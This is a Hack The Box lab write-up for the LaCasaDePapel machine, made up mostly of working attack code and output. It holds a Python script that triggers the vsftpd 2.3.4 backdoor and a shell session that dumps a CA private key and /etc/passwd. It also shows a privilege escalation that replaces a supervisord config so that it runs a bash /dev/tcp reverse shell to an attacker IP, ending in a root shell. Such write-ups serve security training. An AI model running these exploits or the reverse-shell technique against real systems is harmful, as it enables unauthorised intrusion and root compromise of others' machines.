HTB - LaCasaDePapel

Getting Root:

Tools Used:

Nmap

Enumeration

FTP - Port 21

#!/usr/bin/python3                                                                                                                                                                            
import socket                                                                                                                                                                                 
import sys                                                                                                                                                                                    
import time                                                                                                                                                                                   
                                                                                                                                                                                              
                                                                                                                                                                                              
def exploit(ip):
    """Trigger the vsftpd 2.3.4 backdoor on *ip*.

    Connects to the FTP service on TCP port 21 and sends a USER line whose
    user name contains ":)" followed by a PASS line. In the backdoored
    vsftpd 2.3.4 build (CVE-2011-2523) the smiley in the user name causes the
    daemon to open a listener on port 6200; the walkthrough below connects to
    that port afterwards. The server's replies are never read, so the
    "[+] Triggered backdoor" message only means the two lines were sent
    without a socket error -- it does not confirm the backdoor exists.

    Args:
        ip: Target host name or IPv4 address (the socket is AF_INET).

    Returns:
        None. Outcome is reported only through print().

    Raises:
        Nothing: every exception is caught and reported as a failure.
    """

    try:
        print('[*] Attempting to trigger backdoor...')
        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ftp_socket.connect((ip, 21))

        # Attempt to login to trigger backdoor
        # The ":)" in the USER argument is the trigger (and the string a
        # network IDS would match on); the PASS value is irrelevant.
        ftp_socket.send(b'USER letmein:)\n')
        ftp_socket.send(b'PASS please\n')
        # Presumably gives the server time to process the login before the
        # connection is torn down; no reply is read to verify this.
        time.sleep(2)
        ftp_socket.close()
        print('[+] Triggered backdoor')

    except Exception:
        # Broad catch: connection refused, reset, name-resolution and send
        # errors all land here. Note the socket is not closed on this path.
        print('[!] Failed to trigger backdoor on %s' % ip)
                                                                                                                                                                                              
                                                                                                                                                                                              
if __name__ == '__main__':
    # CLI entry point: exactly one positional argument, the target address.
    # Extra arguments are silently ignored; a missing one prints usage and
    # exits with status 0.
    if len(sys.argv) < 2:
        print('Usage: ./vsftpd_234_exploit.py <IP address>')
        print('Example: ./vsftpd_234_exploit.py 192.168.1.10')

    else:
        exploit(sys.argv[1])

python3 vsftpd_234_exploit.py 10.10.10.131                                                                                                              
[*] Attempting to trigger backdoor...                                                                                                                                                         
[+] Triggered backdoor 

Port 6200

rlwrap telnet 10.10.10.131 6200                                                                                                                         
Trying 10.10.10.131...                                                                                                                                                                        
Connected to 10.10.10.131.                                                                                                                                                                    
Escape character is '^]'.                                                                                                                                                                     
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman                                                                                                                                         
scandir(".")                                                                                                                                                                                  
=> [                                                                                                                                                                                          
     ".",                                                                                                                                                                                     
     "..",                                                                                                                                                                                    
     ".DS_Store",                                                                                                                                                                             
     "._.DS_Store",                                                                                                                                                                           
     "bin",                                                                                                                                                                                   
     "boot",                                                                                                                                                                                  
     "dev",                                                                                                                                                                                   
     "etc",                                                                                                                                                                                   
     "home",                                                                                                                                                                                  
     "lib",                                                                                                                                                                                   
     "lost+found",                                                                                                                                                                            
     "media",                                                                                                                                                                                 
     "mnt",                                                                                                                                                                                   
     "opt",                                                                                                                                                                                   
     "proc",                                                                                                                                                                                  
     "root",                                                                                                                                                                                  
     "run",                                                                                                                                                                                   
     "sbin",
     "srv",
     "swap",
     "sys",
     "tmp",
     "usr",
     "var",
   ]
scandir("/home")
=> [
     ".",
     "..",
     "berlin",
     "dali",
     "nairobi",
     "oslo",
     "professor",
   ]
ls
Variables: $tokyo
show $tokyo
  > 2| class Tokyo {
    3|  private function sign($caCert,$userCsr) {
    4|          $caKey = file_get_contents('/home/nairobi/ca.key');
    5|          $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
    6|          openssl_x509_export($userCert, $userCertOut);
    7|          return $userCertOut;
    8|  }
    9| }

file_get_contents("/home/nairobi/ca.key")
=> """
   -----BEGIN PRIVATE KEY-----\n
   MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
   7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
   2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
   uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
   YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
   s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
   PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
   Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
   1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
   /CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
   q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
   uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
   I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
   7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
   G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
   sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
   CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
   sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
   ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
   zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
   ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
   9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
   WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
   7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
   aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
   53udBEzjt3WPqYGkkDknVhjD\n
   -----END PRIVATE KEY-----\n
   """

file_get_contents("/etc/passwd")
=> """
   root:x:0:0:root:/root:/bin/ash\n
   bin:x:1:1:bin:/bin:/sbin/nologin\n
   daemon:x:2:2:daemon:/sbin:/sbin/nologin\n
   adm:x:3:4:adm:/var/adm:/sbin/nologin\n
   lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n
   sync:x:5:0:sync:/sbin:/bin/sync\n
   shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n
   halt:x:7:0:halt:/sbin:/sbin/halt\n
   mail:x:8:12:mail:/var/spool/mail:/sbin/nologin\n
   news:x:9:13:news:/usr/lib/news:/sbin/nologin\n
   uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\n
   operator:x:11:0:operator:/root:/bin/sh\n
   man:x:13:15:man:/usr/man:/sbin/nologin\n
   postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin\n
   cron:x:16:16:cron:/var/spool/cron:/sbin/nologin\n
   ftp:x:21:21::/var/lib/ftp:/sbin/nologin\n
   sshd:x:22:22:sshd:/dev/null:/sbin/nologin\n
   at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin\n
   squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin\n
   xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin\n
   games:x:35:35:games:/usr/games:/sbin/nologin\n
   postgres:x:70:70::/var/lib/postgresql:/bin/sh\n
   cyrus:x:85:12::/usr/cyrus:/sbin/nologin\n
   vpopmail:x:89:89::/var/vpopmail:/sbin/nologin\n
   ntp:x:123:123:NTP:/var/empty:/sbin/nologin\n
   smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin\n
   guest:x:405:100:guest:/dev/null:/sbin/nologin\n
   nobody:x:65534:65534:nobody:/:/sbin/nologin\n
   chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin\n
   dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh\n
   berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash\n
   professor:x:1002:1002:professor,,,:/home/professor:/bin/ash\n
   vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin\n
   memcached:x:102:102:memcached:/home/memcached:/sbin/nologin\n
   """

HTTPS

We get a certificate error

Creating a certificate so that we can access the HTTPS site

# Connecting to the site to check it out
# openssl s_client -connect lacasadepapel.htb:443                                                                                                    
CONNECTED(00000003)                                                                                                                                                                           
depth=0 CN = 'lacasadepapel.htb', O = 'La Casa De Papel'                                                                                                                                          
verify error:num=18:self signed certificate                                                                                                                                                   
verify return:1                                                                                                                                                                               
depth=0 CN = 'lacasadepapel.htb', O = 'La Casa De Papel'                                                                                                                                         
verify return:1                                                                                                                                                                               
---                                                                                                                                                                                           
Certificate chain                                                                                                                                                                             
 0 s:CN = lacasadepapel.htb, O = La Casa De Papel                                                                                                                                             
   i:CN = lacasadepapel.htb, O = La Casa De Papel                                                                                                                                             
---                                                                                                                                                                                           
Server certificate                                                                                                                                                                            
-----BEGIN CERTIFICATE-----                                                                                                                                                                   
MIIC6jCCAdICCQDISiE8M6B29jANBgkqhkiG9w0BAQsFADA3MRowGAYDVQQDDBFs                                                                                                                              
YWNhc2FkZXBhcGVsLmh0YjEZMBcGA1UECgwQTGEgQ2FzYSBEZSBQYXBlbDAeFw0x                                                                                                                              
OTAxMjcwODM1MzBaFw0yOTAxMjQwODM1MzBaMDcxGjAYBgNVBAMMEWxhY2FzYWRl                                                                                                                              
cGFwZWwuaHRiMRkwFwYDVQQKDBBMYSBDYXNhIERlIFBhcGVsMIIBIjANBgkqhkiG                                                                                                                              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-----END CERTIFICATE-----
subject=CN = lacasadepapel.htb, O = La Casa De Papel

issuer=CN = lacasadepapel.htb, O = La Casa De Papel

---

# openssl req -x509 -new -nodes -key CAbull/ca.key -sha256 -days 356 -out CAbull/squid22.pem   
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:La Casa De Papel
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:lacasadepapel.htb
Email Address []:



# openssl pkcs12 -export -in squid22.pem -inkey ca.key -out squid22.p12
Enter Export Password:
Verifying - Enter Export Password:

Importing the certificate to the browser

Verifying the file

# file id_rsa 
id_rsa: OpenSSH private key

Privilege Escalation

There is a file named memcached.ini, owned by root, in the home directory of the user professor.

lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x    4 professo professo      4096 Mar  6  2019 .
drwxr-xr-x    7 root     root          4096 Feb 16  2019 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jan 31  2019 .ssh
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules
lacasadepapel [~]$ 

Contents of the memcached.ini file

cat memcached.ini 
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js

Using pspy64, we can see that something accesses this file and executes the command (the preceding reads of /etc/supervisord.conf suggest it is supervisord picking up the program definition).


2020/04/12 06:06:02 FS:                 OPEN | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:               ACCESS | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:               ACCESS | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:             OPEN DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:             OPEN DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:    CLOSE_NOWRITE DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:    CLOSE_NOWRITE DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:                 OPEN | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:               ACCESS | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:               ACCESS | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:                 OPEN | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.py                                                                                    
2020/04/12 06:06:02 FS:                 OPEN | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc                                                                                   
2020/04/12 06:06:02 FS:               ACCESS | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc                                                                                   
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc                                                                                   
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.py                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:               ACCESS | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:               ACCESS | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:               ACCESS | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/passwd 
2020/04/12 06:07:04 FS:                 OPEN | /var/log/messages                                                                                                                              
2020/04/12 06:07:04 FS:               MODIFY | /var/log/messages                                                                                                                              
2020/04/12 06:07:04 CMD: UID=0    PID=22236  | sudo -u nobody /usr/bin/node /home/professor/memcached.js                                                                                      
2020/04/12 06:07:04 FS:        CLOSE_NOWRITE | /etc/sudoers                                                                                                                                   
2020/04/12 06:07:04 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:07:04 FS:               ACCESS | /etc/passwd                                                  

# We can't edit the file (it is owned by root, mode 644), but the home directory itself is writable by professor, so we can rename it and create a new one in its place
lacasadepapel [~]$ mv memcached.ini memcached.ini.bkp

# We create a replacement memcached.ini whose command is a reverse shell
lacasadepapel [~]$ echo "[program:memcached]" > memcached.ini
lacasadepapel [~]$ echo 'command = bash -c "bash -i >& /dev/tcp/10.10.14.27/1337 0>&1"' >> memcached.ini 
 

# verify the contents of the file
cat memcached.ini
[program:memcached]
command = bash -c "bash -i >& /dev/tcp/10.10.14.27/1337 0>&1"

The command runs as root (the pspy log shows it launched with UID=0), so we get a shell as root

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:52718.
bash: cannot set terminal process group (23063): Not a tty
bash: no job control in this shell
bash-4.4# id
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-4.4# 
